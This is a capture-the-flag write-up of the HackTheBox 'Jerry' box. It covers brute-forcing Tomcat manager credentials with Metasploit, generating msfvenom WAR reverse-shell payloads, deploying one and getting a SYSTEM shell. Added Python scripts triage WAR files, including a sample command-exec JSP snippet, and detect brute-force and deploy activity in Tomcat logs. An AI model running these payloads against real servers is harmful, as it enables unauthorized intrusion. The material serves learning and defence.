HackTheBox: Jerry
01/13/2024
This is the third Windows box I'm doing, after [[Blue]] and [[Legacy]]. These are the easiest of the easy as far as Windows boxes go. I'm still basically just blowing through them and looking at the writeup as soon as I get stuck. I don't feel bad about it since I have 0 experience with this OS, so I don't mind getting a boost and just exposing myself to as much as possible.
Enumeration
That was weird. Multiple nmap scans showed the host as being down. I had to run the nmap option to check if the host was up using sudo nmap -O 10.10.10.95, which finally showed that port 8080 (http-proxy) was open.
Okay. Let me add jerry and jerry.htb to /etc/hosts and then try navigating to the site.
Exploring the tomcat website
http://jerry.htb:8080 brings us to a Tomcat test page.
Using curl -s http://jerry.htb:8080/docs/ | grep Tomcat, we find that it's running Tomcat 7.0.88.
Let's use Metasploit's Tomcat manager bruteforcer:
msf6 exploit(multi/http/tomcat_jsp_upload_bypass) > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 10.10.10.95
RHOSTS => 10.10.10.95
msf6 auxiliary(scanner/http/tomcat_mgr_login) > exploit
<SNIP>
[+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret
</SNIP>
Note that this success was buried in a sea of failures, as is often the case in life and in computers. Anyway yeah, we got manager creds.
With these, going forward, we can upload a WAR file and gain RCE or a revshell.
Getting RCE through the manager page
I'm into the manager page with the credentials tomcat:s3cret.
We get some juicy details about the target system from this page:
- Windows Server 2012 R2
- Windows OS 6.3
- amd64
- Hostname: JERRY
I may as well learn how to use msfvenom to generate a WAR shell. We'll resort to trusty tldr:
$ tldr msfvenom
List payloads:
msfvenom -l payloads
List formats:
msfvenom -l formats
Let's first see what formats we can choose from:
$ msfvenom -l formats
Framework Executable Formats [--format <value>]
===============================================
Name
----
asp
aspx
aspx-exe
axis2
dll
ducky-script-psh
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
jsp
loop-vbs
macho
msi
msi-nouac
osx-app
psh
psh-cmd
psh-net
psh-reflection
python-reflection
vba
vba-exe
vba-psh
vbs
war
"war" is going to be the format we want, which I know from past experience with Tomcat (from Thales, which was the very first box I did on my own). It's some kind of Java-based archive, but I don't remember exactly what it stands for.
So it looks like we'll want to use --format war in the command.
Now let's see what payloads we have at our disposal:
$ msfvenom -l payloads
<SNIP>
cmd/windows/powershell/meterpreter/reverse_tcp
</SNIP>
<SNIP>
windows/x64/meterpreter/reverse_tcp
</SNIP>
One of these two should work.
Back to tldr, it shows an example of generating a file as follows:
Create an EXE binary with a reverse TCP handler:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=local_ip LPORT=local_port -f exe -o path/to/binary.exe
We'll tweak this slightly to meet our needs. We swap exe for war and plug in our host details:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f war -o ./payload.war
Then run msfconsole, start a payload-less listener using use exploit/multi/handler, set the LHOST and LPORT options, and run exploit to start it.
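From the defensive side, a WAR like the one generated above is just a ZIP archive, so whoever reviews deployments (or a pipeline gate in front of the manager) can triage it statically before it is ever unpacked by Tomcat. The script below is an added example and not part of the original writeup: it lists the archive's entries, extracts every JSP, and flags source patterns that server-side code usually has no business using (process execution and raw sockets). The sample archives and the JSP snippets inside them are constructed in memory so the check runs offline; the pattern names are my own, not a signature for any particular tool.

```python
"""Static triage of a WAR file before it is deployed to Tomcat (added example)."""
import io
import re
import zipfile

# Generic Java APIs a defender would want a second look at inside JSP code.
# These are illustrative pattern names, not a vendor signature set.
SUSPICIOUS_PATTERNS = {
    "process_exec": re.compile(r"Runtime\.getRuntime\(\)\.exec|ProcessBuilder"),
    "raw_socket": re.compile(r"java\.net\.Socket|new\s+Socket\("),
}


def triage_war(war_bytes: bytes) -> dict:
    """Inspect a WAR (a ZIP) and report its entries, JSP files, and pattern hits per JSP."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as zf:
        entries = zf.namelist()
        jsp_files = [n for n in entries if n.lower().endswith((".jsp", ".jspx"))]
        for name in jsp_files:
            source = zf.read(name).decode("utf-8", errors="replace")
            hits = [label for label, rx in SUSPICIOUS_PATTERNS.items() if rx.search(source)]
            if hits:
                findings[name] = hits
    return {"entries": entries, "jsp_files": jsp_files, "findings": findings}


def is_suspicious(report: dict) -> bool:
    """A WAR whose JSP code spawns processes or opens raw sockets deserves manual review."""
    return any(
        "process_exec" in hits or "raw_socket" in hits
        for hits in report["findings"].values()
    )


def build_sample_war(jsp_source: str, jsp_name: str = "index.jsp") -> bytes:
    """Build a minimal WAR in memory (constructed sample, not a real deployment)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
        zf.writestr(jsp_name, jsp_source)
    return buf.getvalue()


# Constructed JSP snippets: one ordinary page, one that spawns a process.
BENIGN_JSP = "<html><body>Hello <%= new java.util.Date() %></body></html>"
SHELL_LIKE_JSP = (
    '<%@ page import="java.io.*" %>'
    '<% Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); %>'
)

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_JSP), ("shell-like", SHELL_LIKE_JSP)):
        report = triage_war(build_sample_war(src))
        print(label, "suspicious =", is_suspicious(report), report["findings"])
```

The same triage works on a WAR already sitting in Tomcat's webapps directory, which is where a deployment made through the manager ends up; reading the archive there is often the quickest way to confirm what was actually dropped on a host.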
Now we have to upload the malicious file to the Tomcat server. We navigate to the List Applications tab, and then scroll down to the "WAR file to deploy". Upload the newly-created malicious file.
No luck.
After a bunch of trial and error, I wound up having success with this shell I found online by googling "msfvenom webshell":
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
Then I ran the exploit/multi/handler in msfconsole to set up a meterpreter listener.
Then I uploaded the shell.war file and FINALLY got a shell:
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.24:4444
[*] Command shell session 1 opened (10.10.14.24:4444 -> 10.10.10.95:49192) at 2023-10-13 17:55:50 -0400
Shell Banner:
Microsoft Windows [Version 6.3.9600]
-----
C:\apache-tomcat-7.0.88>pwd
pwd
C:\apache-tomcat-7.0.88>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0834-6C04
Directory of C:\apache-tomcat-7.0.88
06/19/2018 04:07 AM <DIR> .
06/19/2018 04:07 AM <DIR> ..
06/19/2018 04:06 AM <DIR> bin
06/19/2018 06:47 AM <DIR> conf
06/19/2018 04:06 AM <DIR> lib
05/07/2018 02:16 PM 57,896 LICENSE
10/14/2023 06:39 AM <DIR> logs
05/07/2018 02:16 PM 1,275 NOTICE
05/07/2018 02:16 PM 9,600 RELEASE-NOTES
05/07/2018 02:16 PM 17,454 RUNNING.txt
06/19/2018 04:06 AM <DIR> temp
10/14/2023 07:55 AM <DIR> webapps
06/19/2018 04:34 AM <DIR> work
4 File(s) 86,225 bytes
9 Dir(s) 2,364,530,688 bytes free
C:\apache-tomcat-7.0.88>
and here's the best part:
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
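Both manager-side steps in this writeup, the burst of failed logins that tomcat_mgr_login produces before it lands on tomcat:s3cret and the WAR deployment through the manager page, leave a clear trail in Tomcat's access log. The detector below is an added example, not something from the original writeup: it assumes Tomcat's AccessLogValve with the default "common" pattern (%h %l %u %t "%r" %s %b), and the log lines it runs over are constructed to match that layout rather than captured from the box. It raises one alert when a source IP accumulates a threshold of 401s on manager paths, and another when a successful POST/PUT to the manager's upload or deploy endpoint follows, noting whether the same IP was already flagged.

```python
"""Tomcat access-log detection for manager brute force and WAR deploys (added example)."""
import re
from collections import defaultdict

# Matches AccessLogValve's default "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)
MANAGER_LOGIN = re.compile(r"^/manager/(html|text|status)")
# HTML manager upload form and text-interface deploy endpoint.
MANAGER_DEPLOY = re.compile(r"^/manager/(html/upload|text/deploy)")

FAILED_LOGIN_THRESHOLD = 5  # assumption: tune for the environment being monitored


def parse_line(line: str):
    """Return the parsed fields of one access-log line, or None if it does not fit the pattern."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def analyse(lines):
    """Walk log lines in order and return a list of alert dicts."""
    failed = defaultdict(int)       # ip -> number of 401s seen on manager paths
    flagged = set()                 # ips that already crossed the brute-force threshold
    alerts = []
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue
        ip, path, status = rec["ip"], rec["path"], rec["status"]
        if MANAGER_LOGIN.match(path) and status == "401":
            failed[ip] += 1
            if failed[ip] == FAILED_LOGIN_THRESHOLD:
                flagged.add(ip)
                alerts.append({"ip": ip, "type": "manager_bruteforce",
                               "failed_logins": failed[ip]})
        elif (MANAGER_DEPLOY.match(path) and rec["method"] in ("POST", "PUT")
              and status[0] in "23"):
            alerts.append({"ip": ip, "type": "manager_war_deploy", "user": rec["user"],
                           "preceded_by_bruteforce": ip in flagged})
    return alerts


# Constructed sample: six failed manager logins, a success, an upload, then normal traffic.
SAMPLE_LOG = """\
10.10.14.24 - - [13/Oct/2023:17:40:01 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.24 - - [13/Oct/2023:17:40:01 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.24 - - [13/Oct/2023:17:40:02 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.24 - - [13/Oct/2023:17:40:02 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.24 - - [13/Oct/2023:17:40:03 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.24 - - [13/Oct/2023:17:40:03 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.24 - tomcat [13/Oct/2023:17:40:04 -0400] "GET /manager/html HTTP/1.1" 200 12345
10.10.14.24 - tomcat [13/Oct/2023:17:55:40 -0400] "POST /manager/html/upload HTTP/1.1" 302 -
10.10.14.24 - - [13/Oct/2023:17:55:50 -0400] "GET /shell/ HTTP/1.1" 200 -
192.0.2.10 - admin [13/Oct/2023:09:12:00 -0400] "GET /manager/html HTTP/1.1" 200 12345
"""


def run_sample():
    """Run the detector over the constructed sample log."""
    return analyse(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

The ordering matters: a deploy alert that arrives with preceded_by_bruteforce set is the combination seen in this box, and is worth treating differently from a routine deployment by an administrator whose IP never tripped the 401 counter.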